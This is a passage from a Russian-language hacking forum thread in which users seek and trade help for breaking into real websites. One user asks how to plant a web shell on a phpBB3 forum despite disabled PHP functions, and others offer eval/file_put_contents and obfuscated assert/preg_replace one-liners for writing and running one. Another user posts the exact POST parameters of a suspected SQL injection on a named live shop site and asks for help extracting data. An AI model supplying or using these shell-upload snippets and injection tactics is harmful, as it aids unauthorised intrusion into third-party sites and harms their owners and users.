Старый 30.09.2012, 13:10   #2401
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

помоги решить как залиться,что то туплю
форум phpbb3
почти всё отключенно.
allow_url_fopen = On
allow_url_include = Off
disable_functions:
Код:
set_time_limit, dl, passthru, posix_kill, posix_mkfifo, posix_setuid, leak, posix_kill, posix_setpgid, posix_setsid, proc_nice, show_source, system, proc_open, popen, exec, shell_exec	set_time_limit, dl, passthru, posix_kill, posix_mkfifo, posix_setuid, leak, posix_kill, posix_setpgid, posix_setsid, proc_nice, show_source, system, proc_open, popen, exec, shell_exec
пробовал через куки,copy,include,через форму заливки файлов ни как.
Подскажите как ещё залиться?
Faaax вне форума   Ответить с цитированием
Старый 30.09.2012, 15:04   #2402
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

to Faaax
eval(file_put_contents(file_get_contents('Отку да'), 'куда'));
И лучше это все дело делать через base64_encode/decode
cat1vo вне форума   Ответить с цитированием
Старый 30.09.2012, 16:05   #2403
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Не могу добить скъюлю, мб поможете?
http://sale-carpet.ru/index2.php?option=com_vm_ext_search_pro&task=load_ page&limitstart=0&no_html=1
POST:
option=com_vm_ext_search_pro&Itemid=116&category_i d=&catid%5B%5D=32 SQL &pf=&pt=&order_by=final_price&DescOrderBy=ASC&vmxt srch=1
Но видимо помимо catid там и остальные параметры дырявы. Не получается подобрать количество столбцов и вывести информацию
Сергей Бардюр вне форума   Ответить с цитированием
Старый 30.09.2012, 17:03   #2404
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Цитата:
Сообщение от Сергей Бардюр Посмотреть сообщение
Не могу добить скъюлю, мб поможете?
http://sale-carpet.ru/index2.php?option=com_vm_ext_search_pro&task=load_ page&limitstart=0&no_html=1
POST:
option=com_vm_ext_search_pro&Itemid=116&category_i d=&catid%5B%5D=32 SQL &pf=&pt=&order_by=final_price&DescOrderBy=ASC&vmxt srch=1
Но видимо помимо catid там и остальные параметры дырявы. Не получается подобрать количество столбцов и вывести информацию
то что ты показал это не скуля, это exception вызванный передачей catid в виде массива catid[] вместо целочисленной переменной
BigBear вне форума   Ответить с цитированием
Старый 30.09.2012, 17:44   #2405
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Цитата:
Сообщение от cat1vo Посмотреть сообщение
to Faaax
eval(file_put_contents(file_get_contents('Отку да'), 'куда'));
И лучше это все дело делать через base64_encode/decode
всё равно не хочет,вроде и диру на запись вроде как нашёл,но не хочет шелл запускать нормальный
Faaax вне форума   Ответить с цитированием
Старый 30.09.2012, 18:35   #2406
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от cat1vo Посмотреть сообщение
to Faaax
eval(file_put_contents(file_get_contents('Отку да'), 'куда'));
И лучше это все дело делать через base64_encode/decode
Что, простите?
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 30.09.2012, 18:41   #2407
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Наверное он имел в виду

@assert(preg_replace("!(.*)!e",eval($_FILES[(file_get_contents(0J7RgtC60YPQtNCw))])
Pashkela вне форума   Ответить с цитированием
Старый 30.09.2012, 18:55   #2408
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear Посмотреть сообщение
то что ты показал это не скуля, это exception вызванный передачей catid в виде массива catid[] вместо целочисленной переменной
Хм, интересно, мне казалось что SQL это когда выполняются команды мускула, в данном случае работала логика and 1=1 and 1=2 и так далее, то есть как слепую уже можно крутить, а вот вывода походу добиться не судьба. Но всё равно спасибо за разъяснение.
Сергей Бардюр вне форума   Ответить с цитированием
Старый 30.09.2012, 19:06   #2409
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Цитата:
Наверное он имел в виду

@assert(preg_replace("!(.*)!e",eval($_FILES[(file_get_contents(0J7RgtC60YPQtNCw))])
что ещё можете подсказать?
Faaax вне форума   Ответить с цитированием
Старый 30.09.2012, 22:09   #2410
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Так что именно не получается, какие ошибки?
Untitled вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot